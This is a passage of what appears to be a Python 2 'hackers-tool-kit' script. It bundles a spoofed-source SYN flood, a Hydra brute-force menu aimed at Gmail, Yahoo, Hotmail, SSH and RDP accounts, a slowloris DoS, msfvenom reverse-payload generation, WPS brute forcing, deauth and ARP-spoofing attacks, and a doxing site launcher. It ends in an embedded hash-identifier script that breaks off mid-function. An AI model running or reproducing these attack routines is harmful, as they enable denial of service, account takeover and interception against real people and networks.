"Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - 